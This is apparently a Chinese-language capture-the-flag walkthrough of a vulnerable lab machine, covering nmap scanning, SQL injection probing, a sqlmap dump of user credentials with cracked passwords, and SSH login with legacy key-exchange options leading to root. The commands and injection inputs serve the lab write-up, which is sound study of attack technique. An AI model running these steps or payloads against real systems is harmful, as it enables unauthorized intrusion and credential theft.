信息收集
主机探测
靶机IP地址:192.168.88.138
初步扫描
sudo nmap -sT --min-rate 10000 -p- 192.168.88.138
详细信息扫描
sudo nmap -sT -sC -sV -O -p 22,25,80,631 192.168.88.138
可以知道
22端口OpenSSH 4.3(版本较低可能存在漏洞)
25端口Sendmail 8.13.5/8.13.5
80端口Apache httpd 2.2.0 (版本较低可能存在漏洞)
操作系统大概率是Linux
网页标题 Prof. Ehks
一些可能有趣的目录:
/mail/ /restricted/ /conf/ /sql/ /admin/
漏洞脚本扫描
sudo nmap -sT --script=vuln -p 22,25,80,631 192.168.88.138
可以明确的看到80端口大概率存在SQL注入漏洞,虽然也有慢速连接DOS攻击但是渗透测试不考虑。
UDP扫描
没有有效收获
漏洞发现
访问80端口,除了header部分,其它看不懂,估计不是英文。检查源代码没有额外信息。
访问blog页面,观察到url疑似有SQL注入,同时刚刚用nmap扫描时也告知了我们。
漏洞验证
首先输入一个引号发现报错了,但是没有具体报错信息,同时也没有回显点。
http://192.168.88.138/index.html?page=blog&title=Blog&id=2’
接着试了好几个闭合方式都不行,结果整数型闭合可以用。初步判断存在布尔盲注和时间盲注,可以用and sleep(5)判断时间盲注。
漏洞利用
使用sqlmap爆破数据库
sudo sqlmap -u "http://192.168.88.139/index.html?page=blog&title=Blog&id=1" --risk 3 --level 5 --dbs --dump --batch
获取到一些用户,有可能是SSH登录账户,也有可能是网站后台登录的账户。
+---------+-----------+--------------------------------------------------+
| user_id | user_name | user_pass |
+---------+-----------+--------------------------------------------------+
| 1 | dstevens | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf) |
| 2 | achen | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
| 3 | pmoore | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite) |
| 4 | jdurbin | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978) |
| 5 | sorzek | 64d1f88b9b276aece4b0edcc25b7a434 (pacman) |
| 6 | ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1) |
+---------+-----------+--------------------------------------------------+
SSH登录
尝试用上面数据库爆出来的用户密码进行SSH登录,发现靶机的SSH版本太老了,与kali的密钥交换方法不一致。
尝试启用靶机指定的密钥交换方法
$ sudo ssh -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens@192.168.88.139
Unable to negotiate with 192.168.88.139 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
发现再次报错
修改之后再次尝试
sudo ssh -oHostKeyAlgorithms=+ssh-rsa,ssh-dss -oKexAlgorithms=+diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens@192.168.88.139
成功登录,并且发现可执行sudo所有操作。
切换到root
总结
碰巧能够登录SSH只能说运气比较好,但是实际渗透中这种情况很少,如果不是这样的话那这台靶机就不会是这么简单了。
总轨发现了3个可登录的目录/admin/mail/restricted/,都可以用上面的用户中的一些或全部登录。一个关于数据库敏感信息/sql/sq.db,还有一些带有提示性的文件。
内容为:一个日历目录
http://192.168.88.139/calendar/index.php?action=display&year=2023&month=6